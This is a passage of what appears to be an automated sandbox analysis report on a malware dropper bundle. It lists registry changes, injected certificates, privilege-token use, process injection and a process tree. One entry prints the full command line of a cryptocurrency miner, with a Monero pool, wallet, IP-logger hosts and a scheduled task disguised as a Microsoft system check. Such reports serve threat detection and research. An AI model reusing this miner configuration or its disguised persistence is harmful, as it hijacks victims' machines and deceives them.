pAnyK8gwLEtBFe86bDDQpgWE.exetapinstall.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pAnyK8gwLEtBFe86bDDQpgWE.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pAnyK8gwLEtBFe86bDDQpgWE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pAnyK8gwLEtBFe86bDDQpgWE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 6380 timeout.exe 7944 timeout.exe 7152 timeout.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1260 taskkill.exe 4404 taskkill.exe 7948 taskkill.exe 8004 taskkill.exe 4872 taskkill.exe -
Modifies registry class 3 IoCs
Processes:
description ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance -
Processes:
Setup.tmpdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp -
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 23 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 52 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 56 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 161 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 181 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 244 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 282 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 30 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 287 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 42 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 104 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 38 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 46 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 70 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 71 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 77 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 32 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 41 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 57 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 194 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 54 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
xtect12.exeStats.tmpWerFault.exeSetup.tmppid process 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 4224 xtect12.exe 3844 Stats.tmp 3844 Stats.tmp 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 384 WerFault.exe 2220 Setup.tmp 2220 Setup.tmp -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3016 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pAnyK8gwLEtBFe86bDDQpgWE.exepid process 4788 pAnyK8gwLEtBFe86bDDQpgWE.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
2736613.exepid process 7116 2736613.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
askinstall53.exePBrowFile15.exeLivelyScreenRecS1.9.exe7015641.exe4285606.exeWerFault.exeUOOu7lNtPV4PNh_B7bK8DVoZ.exeSetup.tmpmsiexec.exe5567526.exeCleaner Installation.exedescription pid process Token: SeCreateTokenPrivilege 1280 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 1280 askinstall53.exe Token: SeLockMemoryPrivilege 1280 askinstall53.exe Token: SeIncreaseQuotaPrivilege 1280 askinstall53.exe Token: SeMachineAccountPrivilege 1280 askinstall53.exe Token: SeTcbPrivilege 1280 askinstall53.exe Token: SeSecurityPrivilege 1280 askinstall53.exe Token: SeTakeOwnershipPrivilege 1280 askinstall53.exe Token: SeLoadDriverPrivilege 1280 askinstall53.exe Token: SeSystemProfilePrivilege 1280 askinstall53.exe Token: SeSystemtimePrivilege 1280 askinstall53.exe Token: SeProfSingleProcessPrivilege 1280 askinstall53.exe Token: SeIncBasePriorityPrivilege 1280 askinstall53.exe Token: SeCreatePagefilePrivilege 1280 askinstall53.exe Token: SeCreatePermanentPrivilege 1280 askinstall53.exe Token: SeBackupPrivilege 1280 askinstall53.exe Token: SeRestorePrivilege 1280 askinstall53.exe Token: SeShutdownPrivilege 1280 askinstall53.exe Token: SeDebugPrivilege 1280 askinstall53.exe Token: SeAuditPrivilege 1280 askinstall53.exe Token: SeSystemEnvironmentPrivilege 1280 askinstall53.exe Token: SeChangeNotifyPrivilege 1280 askinstall53.exe Token: SeRemoteShutdownPrivilege 1280 askinstall53.exe Token: SeUndockPrivilege 1280 askinstall53.exe Token: SeSyncAgentPrivilege 1280 askinstall53.exe Token: SeEnableDelegationPrivilege 1280 askinstall53.exe Token: SeManageVolumePrivilege 1280 askinstall53.exe Token: SeImpersonatePrivilege 1280 askinstall53.exe Token: SeCreateGlobalPrivilege 1280 askinstall53.exe Token: 31 1280 askinstall53.exe Token: 32 1280 askinstall53.exe Token: 33 1280 askinstall53.exe Token: 34 1280 askinstall53.exe Token: 35 1280 askinstall53.exe Token: SeDebugPrivilege 1968 PBrowFile15.exe Token: SeDebugPrivilege 4148 LivelyScreenRecS1.9.exe Token: SeDebugPrivilege 4216 7015641.exe Token: SeDebugPrivilege 4652 4285606.exe Token: SeRestorePrivilege 384 WerFault.exe Token: SeBackupPrivilege 384 WerFault.exe Token: SeDebugPrivilege 384 WerFault.exe Token: SeDebugPrivilege 4772 UOOu7lNtPV4PNh_B7bK8DVoZ.exe Token: SeDebugPrivilege 2220 Setup.tmp Token: SeSecurityPrivilege 1316 msiexec.exe Token: SeDebugPrivilege 2220 Setup.tmp Token: SeDebugPrivilege 4376 5567526.exe Token: SeCreateTokenPrivilege 1756 Cleaner Installation.exe Token: SeAssignPrimaryTokenPrivilege 1756 Cleaner Installation.exe Token: SeLockMemoryPrivilege 1756 Cleaner Installation.exe Token: SeIncreaseQuotaPrivilege 1756 Cleaner Installation.exe Token: SeMachineAccountPrivilege 1756 Cleaner Installation.exe Token: SeTcbPrivilege 1756 Cleaner Installation.exe Token: SeSecurityPrivilege 1756 Cleaner Installation.exe Token: SeTakeOwnershipPrivilege 1756 Cleaner Installation.exe Token: SeLoadDriverPrivilege 1756 Cleaner Installation.exe Token: SeSystemProfilePrivilege 1756 Cleaner Installation.exe Token: SeSystemtimePrivilege 1756 Cleaner Installation.exe Token: SeProfSingleProcessPrivilege 1756 Cleaner Installation.exe Token: SeIncBasePriorityPrivilege 1756 Cleaner Installation.exe Token: SeCreatePagefilePrivilege 1756 Cleaner Installation.exe Token: SeCreatePermanentPrivilege 1756 Cleaner Installation.exe Token: SeBackupPrivilege 1756 Cleaner Installation.exe Token: SeRestorePrivilege 1756 Cleaner Installation.exe Token: SeShutdownPrivilege 1756 Cleaner Installation.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
xiGD01oEkhh5s50F0Mw8lPVJ.tmpCleaner Installation.exeInlog.tmpWEATHER Manager.tmpVPN.tmpStats.tmpSetup.exeSetup.tmppid process 1568 xiGD01oEkhh5s50F0Mw8lPVJ.tmp 1756 Cleaner Installation.exe 1068 Inlog.tmp 2812 WEATHER Manager.tmp 4172 VPN.tmp 3844 Stats.tmp 4140 Setup.exe 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
builder.exepid process 4260 builder.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
xiGD01oEkhh5s50F0Mw8lPVJ.exexiGD01oEkhh5s50F0Mw8lPVJ.tmpSetup.exeStats.exeInlog.exeWEATHER Manager.exeVPN.exeMediaBurner2.exezhaoy-game.exePBrowFile15.exedescription pid process target process PID 748 wrote to memory of 1568 748 xiGD01oEkhh5s50F0Mw8lPVJ.exe xiGD01oEkhh5s50F0Mw8lPVJ.tmp PID 748 wrote to memory of 1568 748 xiGD01oEkhh5s50F0Mw8lPVJ.exe xiGD01oEkhh5s50F0Mw8lPVJ.tmp PID 748 wrote to memory of 1568 748 xiGD01oEkhh5s50F0Mw8lPVJ.exe xiGD01oEkhh5s50F0Mw8lPVJ.tmp PID 1568 wrote to memory of 3580 1568 xiGD01oEkhh5s50F0Mw8lPVJ.tmp Setup.exe PID 1568 wrote to memory of 3580 1568 xiGD01oEkhh5s50F0Mw8lPVJ.tmp Setup.exe PID 1568 wrote to memory of 3580 1568 xiGD01oEkhh5s50F0Mw8lPVJ.tmp Setup.exe PID 3580 wrote to memory of 3180 3580 Setup.exe Stats.exe PID 3580 wrote to memory of 3180 3580 Setup.exe Stats.exe PID 3580 wrote to memory of 3180 3580 Setup.exe Stats.exe PID 3580 wrote to memory of 2576 3580 Setup.exe runvd.exe PID 3580 wrote to memory of 2576 3580 Setup.exe runvd.exe PID 3580 wrote to memory of 2576 3580 Setup.exe runvd.exe PID 3580 wrote to memory of 2320 3580 Setup.exe Inlog.exe PID 3580 wrote to memory of 2320 3580 Setup.exe Inlog.exe PID 3580 wrote to memory of 2320 3580 Setup.exe Inlog.exe PID 3580 wrote to memory of 1756 3580 Setup.exe Cleaner Installation.exe PID 3580 wrote to memory of 1756 3580 Setup.exe Cleaner Installation.exe PID 3580 wrote to memory of 1756 3580 Setup.exe Cleaner Installation.exe PID 3580 wrote to memory of 3872 3580 Setup.exe WEATHER Manager.exe PID 3580 wrote to memory of 3872 3580 Setup.exe WEATHER Manager.exe PID 3580 wrote to memory of 3872 3580 Setup.exe WEATHER Manager.exe PID 3180 wrote to memory of 3844 3180 Stats.exe Stats.tmp PID 3180 wrote to memory of 3844 3180 Stats.exe Stats.tmp PID 3180 wrote to memory of 3844 3180 Stats.exe Stats.tmp PID 3580 wrote to memory of 1496 3580 Setup.exe VPN.exe PID 3580 wrote to memory of 1496 3580 Setup.exe VPN.exe PID 3580 wrote to memory of 1496 3580 Setup.exe VPN.exe PID 3580 wrote to memory of 1280 3580 Setup.exe askinstall53.exe PID 3580 wrote to memory of 1280 3580 Setup.exe askinstall53.exe PID 3580 wrote to memory of 1280 3580 Setup.exe askinstall53.exe PID 2320 wrote to memory of 1068 2320 Inlog.exe Inlog.tmp PID 2320 wrote to memory of 1068 2320 Inlog.exe Inlog.tmp PID 2320 wrote to memory of 1068 2320 Inlog.exe Inlog.tmp PID 3580 wrote to memory of 3356 3580 Setup.exe MediaBurner2.exe PID 3580 wrote to memory of 3356 3580 Setup.exe MediaBurner2.exe PID 3580 wrote to memory of 3356 3580 Setup.exe MediaBurner2.exe PID 3580 wrote to memory of 1968 3580 Setup.exe PBrowFile15.exe PID 3580 wrote to memory of 1968 3580 Setup.exe PBrowFile15.exe PID 3872 wrote to memory of 2812 3872 WEATHER Manager.exe WEATHER Manager.tmp PID 3872 wrote to memory of 2812 3872 WEATHER Manager.exe WEATHER Manager.tmp PID 3872 wrote to memory of 2812 3872 WEATHER Manager.exe WEATHER Manager.tmp PID 3580 wrote to memory of 1556 3580 Setup.exe zhaoy-game.exe PID 3580 wrote to memory of 1556 3580 Setup.exe zhaoy-game.exe PID 3580 wrote to memory of 1556 3580 Setup.exe zhaoy-game.exe PID 3580 wrote to memory of 4148 3580 Setup.exe LivelyScreenRecS1.9.exe PID 3580 wrote to memory of 4148 3580 Setup.exe LivelyScreenRecS1.9.exe PID 1496 wrote to memory of 4172 1496 VPN.exe VPN.tmp PID 1496 wrote to memory of 4172 1496 VPN.exe VPN.tmp PID 1496 wrote to memory of 4172 1496 VPN.exe VPN.tmp PID 3580 wrote to memory of 4224 3580 Setup.exe xtect12.exe PID 3580 wrote to memory of 4224 3580 Setup.exe xtect12.exe PID 3580 wrote to memory of 4224 3580 Setup.exe xtect12.exe PID 3356 wrote to memory of 4308 3356 MediaBurner2.exe MediaBurner2.tmp PID 3356 wrote to memory of 4308 3356 MediaBurner2.exe MediaBurner2.tmp PID 3356 wrote to memory of 4308 3356 MediaBurner2.exe MediaBurner2.tmp PID 1556 wrote to memory of 4792 1556 zhaoy-game.exe zhaoy-game.exe PID 1556 wrote to memory of 4792 1556 zhaoy-game.exe zhaoy-game.exe PID 1556 wrote to memory of 4792 1556 zhaoy-game.exe zhaoy-game.exe PID 1968 wrote to memory of 4216 1968 PBrowFile15.exe 7015641.exe PID 1968 wrote to memory of 4216 1968 PBrowFile15.exe 7015641.exe PID 1968 wrote to memory of 2136 1968 PBrowFile15.exe 2304792.exe PID 1968 wrote to memory of 2136 1968 PBrowFile15.exe 2304792.exe PID 1968 wrote to memory of 2136 1968 PBrowFile15.exe 2304792.exe PID 1968 wrote to memory of 4376 1968 PBrowFile15.exe 5567526.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\xiGD01oEkhh5s50F0Mw8lPVJ.exe"C:\Users\Admin\AppData\Local\Temp\xiGD01oEkhh5s50F0Mw8lPVJ.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Users\Admin\AppData\Local\Temp\is-IMVR7.tmp\xiGD01oEkhh5s50F0Mw8lPVJ.tmp"C:\Users\Admin\AppData\Local\Temp\is-IMVR7.tmp\xiGD01oEkhh5s50F0Mw8lPVJ.tmp" /SL5="$20112,138429,56832,C:\Users\Admin\AppData\Local\Temp\xiGD01oEkhh5s50F0Mw8lPVJ.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\is-EUIIC.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EUIIC.tmp\Setup.exe" /Verysilent3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Users\Admin\AppData\Local\Temp\is-OOPLT.tmp\Stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-OOPLT.tmp\Stats.tmp" /SL5="$10266,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3844 -
C:\Users\Admin\AppData\Local\Temp\is-FSVRU.tmp\builder.exe"C:\Users\Admin\AppData\Local\Temp\is-FSVRU.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4260 -
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"4⤵
- Executes dropped EXE
PID:2576 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 9005⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4748 -
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet4⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1756 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629494036 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"5⤵PID:5548
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1280 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5204
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:1260 -
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3356 -
